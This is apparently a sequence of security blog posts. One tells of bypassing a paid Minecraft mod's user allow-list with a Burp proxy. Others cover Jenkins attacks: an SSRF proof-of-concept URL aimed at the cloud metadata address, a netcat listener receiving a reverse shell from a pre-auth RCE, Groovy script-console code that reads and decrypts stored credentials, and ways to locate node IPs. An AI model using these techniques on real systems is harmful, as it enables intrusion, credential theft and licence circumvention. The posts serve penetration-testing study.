However, my FAVORITE suggestion came from a co-worker of mine (and all around super cool/talented hacker) <a href="https://twitter.com/fletchto99">Matt Langlois</a>. He had an idea for a better workaround. One that didn't require proxying web traffic or for you to even be connected to the internet. He decided to override the code that checks the list of allowed users and inject our UUID into that list. It works beautifully but rather than try to explain the details in this blog post, I <a href="https://blog.fletchto99.com/2019/may/minecraft-mod-reversing/">suggest you visit his blog post to check out the details</a>.<br />
<br />
The gist is that Java reflection allows you to override methods in memory and this is exactly what Matt did. So - <a href="https://blog.fletchto99.com/2019/may/minecraft-mod-reversing/">go check out the blog post!</a>cktrickyhttp://www.blogger.com/profile/16815248087217800849noreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-63902820151241077432019-05-13T11:59:00.000-04:002019-05-13T11:59:39.209-04:00Minecraft Mod, Mother's Day, and A Hacker DadOver the weekend my wife was feeling under the weather. This meant we were stuck indoors and since she is sick and it's Mother's day weekend - less than ideal situation - I needed to keep my son as occupied as possible so she could rest and recuperate.<br />
<br />
When I asked my son what he wanted to do, he responded with a new Minecraft mod he'd seen on one of these YouTuber's channels. The mod allows you be various Marvel superheroes! Except, the mod version we downloaded... well it lacked the suits he'd seen on YouTube (of course it did).<br />
<br />
Did my homework, realized he wanted a version that was only released if you were a Patreon supporter. Now, I'm totally cool giving 5 bucks for software that somebody poured their heart into and with having recently watched Endgame... the desire for the Iron man stuff shown in this paid-for-mod was larger than the desire to hold on to my 5 dollars. Went on Patreon, donated the $5, and downloaded the mod. Fired it up, everything appeared fine... then I got this...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJoBsg7lJwc-pExzQk14EmxixuUXd0OfgqP2G0QjHNt-bpRCEpTdvdRr9ZRPggZCr_c4QsJ7RQFHle07pV4Rf3km0n6tF6Ac_3edK73XNn-X6ceBwNkNnWBSf5fIQZneESt2_Vnmdbw-VF/s1600/Screen+Shot+2019-05-12+at+7.27.48+PM.png" imageanchor="1"><img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJoBsg7lJwc-pExzQk14EmxixuUXd0OfgqP2G0QjHNt-bpRCEpTdvdRr9ZRPggZCr_c4QsJ7RQFHle07pV4Rf3km0n6tF6Ac_3edK73XNn-X6ceBwNkNnWBSf5fIQZneESt2_Vnmdbw-VF/s640/Screen+Shot+2019-05-12+at+7.27.48+PM.png" width="640" /></a><br />
<br />
What? Seriously? Well, I go back in and re-read the Patreon message...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQoANN_PqVX12F8CoVqkYjJQSQ0r6vqIk129uyJAgA-J85GzYyzQvBUkb9OlxQVV1f5K3aRcDfXDSaUy2YEhaShJhYb-g-xoIkOrPu4Kf8rmjildGTvC7WZbJ_6-7f5TXtZlCQCOxqVtp/s1600/Screen+Shot+2019-05-12+at+8.03.27+PM.png" imageanchor="1"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQoANN_PqVX12F8CoVqkYjJQSQ0r6vqIk129uyJAgA-J85GzYyzQvBUkb9OlxQVV1f5K3aRcDfXDSaUy2YEhaShJhYb-g-xoIkOrPu4Kf8rmjildGTvC7WZbJ_6-7f5TXtZlCQCOxqVtp/s640/Screen+Shot+2019-05-12+at+8.03.27+PM.png" width="640" /></a><br />
<br />
Ugh, so a couple issues here. One, we wanted access now. Taking a day (maybe) to add us to some magical list is less than ideal (which, the creator still hasn't responded to my emails so perhaps... never?). Secondly, I'm wondering if this is some sort of "donate $5 every month to continue being on the magical list to use this mod". And, if I already paid for software, I just plain old don't like being at the mercy of someone else.<br />
<br />
Time to be the hacker dad hero my son needs :P (plus, I wanted to teach him a life lesson about the hacker spirit).<br />
<br />
Okay so... a mod is just a jar file... let's open this up with JD-GUI and search for "Unauthorized use".<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL8LcjOLRozpik5LokLD1XpNPE3uduThZFr_j3mfW5oK_yWEOswb2yd_0K_CcE5cadfm6rC1wUkaH2S8hEViLGATTd-m2cYYKV38ww6WMLoFg1pWvEPxgKoYocACHjAzg1lmhVu_sQ3lS/s1600/Screen+Shot+2019-05-12+at+8.10.35+PM.png" imageanchor="1"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL8LcjOLRozpik5LokLD1XpNPE3uduThZFr_j3mfW5oK_yWEOswb2yd_0K_CcE5cadfm6rC1wUkaH2S8hEViLGATTd-m2cYYKV38ww6WMLoFg1pWvEPxgKoYocACHjAzg1lmhVu_sQ3lS/s400/Screen+Shot+2019-05-12+at+8.10.35+PM.png" width="400" /></a><br />
<br />
Each of these handlers has the same code, they all look basically identical, and they are checking to see if you're in a list and if you're not, then you don't get to play.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaMoLO8Wu7NjCsABeoTYE8oDCdj9YPYRlClpBh2weuUkGxaITiXkA7ap95hMrrbgOxGaxdPIYj_OtmLjI_QfynWwaNwVJBudKlSjmgb5sQFwSVrTxHwvIwlzKsm7ThyVwneTK2BtkCZKO4/s1600/Screen+Shot+2019-05-12+at+8.14.32+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaMoLO8Wu7NjCsABeoTYE8oDCdj9YPYRlClpBh2weuUkGxaITiXkA7ap95hMrrbgOxGaxdPIYj_OtmLjI_QfynWwaNwVJBudKlSjmgb5sQFwSVrTxHwvIwlzKsm7ThyVwneTK2BtkCZKO4/s1600/Screen+Shot+2019-05-12+at+8.14.32+PM.png" /></a></div>
<br />
So where is this list coming from? Looks like <b>SuperHeroesBetaTesterChecker.getList()</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDZeEDAhbDKDYCLFttljhL92LJu5Ku_R4FSQKWrt7i4pZ0uN5nC0KdsqlCPzwgoMmcrCTNua6OeiSyHFx3lF1Ft4iSkPY6u-z4QaDqzv3e-GIihHLKjh39nVCt3JKGpX7M9sFEjwOZkKHo/s1600/Screen+Shot+2019-05-12+at+8.18.32+PM.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDZeEDAhbDKDYCLFttljhL92LJu5Ku_R4FSQKWrt7i4pZ0uN5nC0KdsqlCPzwgoMmcrCTNua6OeiSyHFx3lF1Ft4iSkPY6u-z4QaDqzv3e-GIihHLKjh39nVCt3JKGpX7M9sFEjwOZkKHo/s1600/Screen+Shot+2019-05-12+at+8.18.32+PM.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dtI51eOy_vADDRSBnbYPbAA7grt4X5F84vKx-c37swUwrIqRIHR7FC7veu0o42d7qHBpHK5tFTaQP7tT8eOpD24hrWAnyAcP_6qKPiyLx4J5n68Sw6V4i_wTAP3ryeAoaK3CINKK2L0x/s1600/Screen+Shot+2019-05-12+at+8.20.42+PM.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dtI51eOy_vADDRSBnbYPbAA7grt4X5F84vKx-c37swUwrIqRIHR7FC7veu0o42d7qHBpHK5tFTaQP7tT8eOpD24hrWAnyAcP_6qKPiyLx4J5n68Sw6V4i_wTAP3ryeAoaK3CINKK2L0x/s1600/Screen+Shot+2019-05-12+at+8.20.42+PM.png" /></a><br />
<br />
What? Are we seriously pulling down some list from pastebin.com to find out who our authorized users are?<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo8ZUqkqWKafE5s9k2gbUvOAD7cTIWOlaL8qOy0scfzd2xSUhTywojmMgoSpY8_ljSw13pOfsRaQhztvezQEmZvM0DgKlC7BCLlcGrPjlhNa78tZJxrrOgiUIWTBri10zon-91ZW251Md/s1600/Screen+Shot+2019-05-12+at+8.23.12+PM.png" imageanchor="1"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpo8ZUqkqWKafE5s9k2gbUvOAD7cTIWOlaL8qOy0scfzd2xSUhTywojmMgoSpY8_ljSw13pOfsRaQhztvezQEmZvM0DgKlC7BCLlcGrPjlhNa78tZJxrrOgiUIWTBri10zon-91ZW251Md/s320/Screen+Shot+2019-05-12+at+8.23.12+PM.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCGrJqzXKZRr5ZQLJ1VLf83cnZCV7r69lZA1-4jadTJvd0qrq3qcOur1YmlD5n4a05lmFZEhrBO12R7Xlqm2wqktVyiHF-sb_7Oi-U8Muxr8I1zLsTkhUoBQKKuqcjo_1_ip5bxW0yaDb/s1600/giphy.gif" imageanchor="1"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCGrJqzXKZRr5ZQLJ1VLf83cnZCV7r69lZA1-4jadTJvd0qrq3qcOur1YmlD5n4a05lmFZEhrBO12R7Xlqm2wqktVyiHF-sb_7Oi-U8Muxr8I1zLsTkhUoBQKKuqcjo_1_ip5bxW0yaDb/s320/giphy.gif" width="320" /></a><br />
<br />
Alright.... so... UUIDs? As it turns out, UUIDs map to usernames and that information is totally retrievable and this handy site helps <a href="https://mcuuid.net/">https://mcuuid.net/</a>.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo19o8Ac18XsMO3aVXDKpyC4KsMhRih_IPMsNqyU88pq-e3siNidNxTuau8wurDvP_WjXiRRrNvcIGKIqCRIE3wc9sIg5F32unEHsSroeWJSA5QiAeJUJ2CWxpj6IEUPdKm9QqT0em5k_y/s1600/Screen+Shot+2019-05-12+at+8.27.00+PM.png" imageanchor="1"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo19o8Ac18XsMO3aVXDKpyC4KsMhRih_IPMsNqyU88pq-e3siNidNxTuau8wurDvP_WjXiRRrNvcIGKIqCRIE3wc9sIg5F32unEHsSroeWJSA5QiAeJUJ2CWxpj6IEUPdKm9QqT0em5k_y/s320/Screen+Shot+2019-05-12+at+8.27.00+PM.png" width="320" /></a><br />
Cool so now I know our UUIDs (and you do too but, again, anyone can find that out so it's really whatever).<br />
<br />
Now originally, I tried decompiling, changing the source and recompiling. At one point I even had my environment setup to compile from Eclipse with forge and this source code. But this was taking a couple hours and I needed a <b><u>quick</u></b> solution. This is where Burp came into play. Here is what I did.<br />
<br />
1. Set Burp to listen on all interfaces under the proxy options<br />
2. Exported its certificate so that both my son and my machines trusted the proxy for https traffic (no cert warnings)<br />
3. Set our machines to use the Burp proxy for all of our traffic for Secure Web Traffic<br />
4. Added a few proxy match & replace rules that replaces one of the other UUIDs with ours (and usernames for dev level access because.. why not)<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WxhTMyfaminRiUOSTjA-ndMA9gc24ALIGpjlJecZQoawUvxXNBMZ2m0rJEKQJs4rX3epGaVLr9xJeFihbv-OZwKrw7w1I8pnoNcK_637JZud7RtD65GG6NG0JtEc1aLnWbZy-FaO1f_1/s1600/Screen+Shot+2019-05-13+at+11.41.50+AM.png" imageanchor="1"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WxhTMyfaminRiUOSTjA-ndMA9gc24ALIGpjlJecZQoawUvxXNBMZ2m0rJEKQJs4rX3epGaVLr9xJeFihbv-OZwKrw7w1I8pnoNcK_637JZud7RtD65GG6NG0JtEc1aLnWbZy-FaO1f_1/s640/Screen+Shot+2019-05-13+at+11.41.50+AM.png" width="640" /></a><br />
<br />
That's basically it. Once our machines started routing traffic thru my Burp proxy, every response from pastebin.com with those UUIDs automatically had ours added to the list as authorized users and it worked like a charm.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0iIqss0UMKlttn8_TrNVAo7SuCothlgQmFPCOtTtF8fa4bA3YwRosPfB2yIRQbmT0wWUgMrITrIo8NqVZ8Fj20dabL_YvAWVLKnvwKxQOJYv_R3dnmQpk6t-uuSbvGtMgs3-037QJuE8/s1600/Screen+Shot+2019-05-13+at+11.49.32+AM.png" imageanchor="1"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW0iIqss0UMKlttn8_TrNVAo7SuCothlgQmFPCOtTtF8fa4bA3YwRosPfB2yIRQbmT0wWUgMrITrIo8NqVZ8Fj20dabL_YvAWVLKnvwKxQOJYv_R3dnmQpk6t-uuSbvGtMgs3-037QJuE8/s640/Screen+Shot+2019-05-13+at+11.49.32+AM.png" width="640" /></a><br />
<br />
Note that I have not given detailed instructions on those above 4 steps because... there are already tons of tutorials out there if you're not already familiar with Burp & proxying web traffic.<br />
<br />
Let's summarize. We paid $5, and we got told we still needed special permission to use this mod. Didn't sit well, wanted to get this working, and figured I could teach my son a little bit about computers/hacking. Now, did I email the creator of the mod? Yes, in fact I let them know what I found and the workaround. Was very upfront about that. Also provided usernames in case the creator did feel like adding them (though I doubt he's feeling super generous). But we had some fun, learned a little, and got to use the mod.<br />
<br />
Having said all that, if you're in a position to donate even a few bucks for software that someone spends a good chunk of their time writing, I'd say do it. But if they don't deliver as promised... put on your hacker hat :-).<br />
<br />
<br />
<br />cktrickyhttp://www.blogger.com/profile/16815248087217800849noreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-27153271887369579072019-03-05T14:01:00.003-05:002019-03-05T14:01:41.948-05:00Jenkins - CVE-2018-1000600 PoC<br />
<br />
<span style="color: #444444;">second exploit from the blog post</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank"><span style="color: #444444;">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</span></a><br />
<span style="color: #444444;"><span style="background-color: white; font-family: "ubuntu";"><br /></span>
<span style="background-color: white; font-family: "ubuntu";">Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF</span></span><br />
<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915">https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915</a></span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;">This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I'm honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.</span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;">exploit works against: </span>GitHub Plugin up to and including 1.29.1</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">When i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">From the blog post:</span><br />
<span style="color: #444444;"><br /></span>
<br />
<blockquote class="tr_bq">
<span style="color: #444444;"><span style="background-color: #f8f8f8; font-family: "ubuntu"; font-size: 13.2px;">CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials</span> </span></blockquote>
<blockquote class="tr_bq">
<span style="background-color: white; color: #444444; font-family: "ubuntu"; font-size: 13.2px;">It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)</span></blockquote>
<blockquote class="tr_bq">
<span style="background-color: white; color: #444444; font-family: "ubuntu"; font-size: 13.2px;">Although it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!</span></blockquote>
<div style="background-color: white; box-sizing: border-box; font-family: "ubuntu"; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<span style="color: #444444;">PoC:</span></div>
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-family: "source code pro", monospace; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-family: "source code pro", monospace; font-size: inherit; padding: 0px;"><span style="color: #444444;">http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai</span></code></pre>
<span style="color: #444444;"><span style="background-color: white; font-family: "ubuntu";"><br /></span><span style="font-family: "ubuntu";"><span style="background-color: white;">To get old versions of the plugin and info you can go to </span></span> <span style="background-color: white; font-family: "ubuntu";"><br /></span>
<span style="background-color: white;"><span style="font-family: "ubuntu";"><a href="https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin" target="_blank">https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin</a></span></span></span><br />
<span style="color: #444444;"><span style="background-color: white;"><span style="font-family: "ubuntu";"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "ubuntu";">download old versions</span></span></span><br />
<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://updates.jenkins.io/download/plugins/github-branch-source/" target="_blank">https://updates.jenkins.io/download/plugins/github-branch-source/</a></span></span><br />
<span style="background-color: white;"><span style="color: #444444; font-family: "ubuntu";"><a href="https://updates.jenkins.io/download/plugins/github/" target="_blank">https://updates.jenkins.io/download/plugins/github/</a></span></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-68149048590467443612019-03-04T22:26:00.000-05:002019-03-04T22:26:46.045-05:00Jenkins - messing with exploits pt3 - CVE-2019-1003000<span style="color: #444444;">References:</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://www.exploit-db.com/exploits/46453" target="_blank"><span style="color: #444444;">https://www.exploit-db.com/exploits/46453</span></a><br />
<a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank"><span style="color: #444444;">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This post covers the Orange Tsai Jenkins pre-auth exploit</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Vuln versions: Jenkins < 2.137 (preauth)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Pipeline: Declarative Plugin up to and including 1.3.4</span><br />
<span style="color: #444444;">Pipeline: Groovy Plugin up to and including 2.61</span><br />
<span style="color: #444444;">Script Security Plugin up to and including 1.49 (in CG's testing 1.50 is also vuln)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU/s1600/Screen+Shot+2019-03-04+at+10.10.59+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="409" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU/s640/Screen+Shot+2019-03-04+at+10.10.59+PM.png" width="640" /></span></a></div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: Courier New, Courier, monospace;">nc -l 8888 -vv</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #444444; font-family: Courier New, Courier, monospace;">whoami</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;">bash: no job control in this shell</span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;"> bash-3.2$ jenkins</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: Times, Times New Roman, serif;">After Jenkins 2.138 the preauth is gone but if you have an overall read token and the plugins are still vulnerable you can still exploit that server. You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.</span><br />
<span style="color: #444444; font-family: Times, Times New Roman, serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8/s1600/Screen+Shot+2019-03-04+at+10.21.38+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="244" data-original-width="1112" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8/s400/Screen+Shot+2019-03-04+at+10.21.38+PM.png" width="400" /></span></a></div>
<span style="font-family: Times, Times New Roman, serif;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-85759044095769594072019-03-04T21:16:00.002-05:002019-03-04T21:16:15.412-05:00Jenkins - Identify IP Addresses of nodes<span style="color: #444444;">While doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes. You might want to know this if you read the <a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html" target="_blank">decrypting credentials post</a> and managed to get yourself some ssh keys for nodes but you cant actually see the node's IP in the Jenkins UI.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Stackoverflow link: <a href="https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node" target="_blank">https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node</a></span><br />
<span style="color: #444444;">blog on setting up a node: <a href="https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node" target="_blank">https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"> There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">You can just browse to <span style="font-family: Courier New, Courier, monospace;">jenkins-ip/computer/$nodename/config.xml</span>. This request will require the <b>extended read </b>permission.</span><br />
<span style="color: #444444;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI/s1600/Screen+Shot+2019-03-04+at+9.14.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="636" data-original-width="1600" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI/s640/Screen+Shot+2019-03-04+at+9.14.23+PM.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Optionally if you are on the box or have a backup you can go to <span style="font-family: Courier New, Courier, monospace;">jenkins-dir/nodes/$nodename/config.xml</span></span><br />
<span style="color: #444444; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-78079810961179254352019-02-28T10:22:00.001-05:002019-04-08T16:34:04.155-04:00Jenkins - decrypting credentials.xml<span style="color: #444444;">If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">hashed_pw='$PASSWORDHASH'</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">passwd = hudson.util.Secret.decrypt(hashed_pw)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">println(passwd)</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;">You need to perform this on the the Jenkins system itself as it's using the local <span style="font-family: "courier new" , "courier" , monospace;">master.key</span> and <span style="font-family: "courier new" , "courier" , monospace;">hudson.util.Secret</span></span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;">Screenshot below</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y/s1600/Screen+Shot+2019-02-28+at+9.55.48+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="914" data-original-width="1600" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y/s640/Screen+Shot+2019-02-28+at+9.55.48+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">Code to get the credentials.xml from the script console</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">Windows</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def sout = new StringBuffer(), serr = new StringBuffer()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def proc = 'cmd.exe /c type credentials.xml'.execute()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.consumeProcessOutput(sout, serr)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.waitForOrKill(1000)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #444444;">println "out> $sout err> $serr"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">*nix</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def sout = new StringBuffer(), serr = new StringBuffer()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">def proc = 'cat credentials.xml'.execute()</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.consumeProcessOutput(sout, serr)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">proc.waitForOrKill(1000)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #444444;">println "out> $sout err> $serr"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
